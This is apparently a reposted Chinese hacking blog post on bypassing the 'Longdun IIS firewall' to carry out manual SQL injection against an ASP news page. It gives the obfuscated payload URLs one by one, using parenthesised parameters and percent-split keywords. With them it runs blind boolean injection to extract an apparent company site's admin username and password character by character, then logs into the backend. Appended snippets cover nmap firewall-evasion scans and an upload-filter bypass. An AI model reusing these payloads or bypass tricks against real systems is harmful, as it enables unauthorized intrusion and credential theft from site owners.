小方法「繞過龍盾防火牆」

2021-12-29 20:23:31 字數 2816 閱讀 1627

今天的技術主要是結合網上的和自己的想法思路繞過」龍盾iis防火牆「其他防火牆沒試過

好的廢話不多說實戰開始,

手工注入,工具是不行啦,

第一咱先判斷是否有注入點

/newsshow.asp?articleid=120 』

/newsshow.asp?articleid=120 and 1=1

/newsshow.asp?articleid=120 and 1=2

一直提示 「龍盾iis防火牆」提示:請不要提交非法資訊或惡意訪問

我想這個大家應該都不陌生,現在國內用這個的防火牆還挺多的,我看網上資料也比較少呵呵

自己研究了一下

成功突破~

/newsshow.asp?articleid=(120)%20and%20(%201=1%20) 返回正常

/newsshow.asp?articleid=(120)%20and%20(%201=2%20) 返回錯誤

呵呵,看來已經成功突破防火牆的限制啦~哈哈~

繼續踩解吧~

/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct * from admin)

呵呵返回成功,存在admin表,應該是個access的~是乙個公司**,估計也是access的呵呵

/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct username from admin)

呵呵返回成功,存在username表

/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct password from admin)

呵呵返回成功,存在password表

繼續往下踩解吧~走吧,

/newsshow.asp?articleid=(120) order by 1

/newsshow.asp?articleid=(120) order by 1 order by 1

一直返回錯誤 看來 order 是用不了了,沒辦法 只有乙個乙個的去踩解啦~

先看看管理員使用者名稱有幾位吧~

/newsshow.asp?articleid=(120) and ex%%%ists(sele%%%ct username from admin where len(username)=5)

一切正常呵呵,不錯 rp挺好~

/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,1))=120)

/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,2))=50)

/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,3))=99)

/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,4))=51)

/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,5))=109)

賬號都出來了, 用計算器轉化了下

帳號就是:x2c3m

後面猜解密碼~~

/newsshow.asp?articleid=(120) and ex%%%ists(sele%%%ct password from admin where len(password)=8) 密碼一共有8位數

/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,1))=98)

/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,2))=105)

/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,3))=111)

/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,4))=115)

/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,5))=108)

/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,6))=111)

/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,7))=97)

/newsshow.asp?articleid=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,8))=100)

密碼:b***ad

直接去後台登陸,成功搞定

from:小 馬'blog

nmap繞過防火牆

1.發現防火牆 1 nmap sa 如果結果是filtered,那麼應該就是有防火牆 2 nmap badsum 事實上,所有主機都會丟棄錯誤checksum的資料報。如果收到響應,那麼可能是那些沒有檢查資料報的防火牆或ips。2.繞過防火牆 1 nmap ff 2 nmap f script fi...

Nmap繞過防火牆

1.碎片化 nmap傳送8個位元組的資料報繞過防火牆 ids ips。在防火牆配置不當的時候有用。nmap f host mtu,最大傳輸單元,它是碎片化的別名,我們可以指定它的大小 8的倍數 2.誘餌這種型別的掃瞄是非常隱蔽且無法察覺。目標由多個假冒或偽造ip位址進行掃瞄。這樣防火牆就會認為攻擊或...

ashx繞過防火牆

2.比較笨的方法,看 吧 我對 進行測試使用,防火牆依然檢查aspx字尾,pnig0s的 是上傳xx.jpg儲存的也是xx.jpg,xx.txt也是xx.txt,我的方法是做了乙個小的修改,偽原創。而且客戶端不用那麼麻煩。上傳任何型別檔案 防火牆不檢查的字尾 都會在服務端自動重新命名.看 吧 服務端...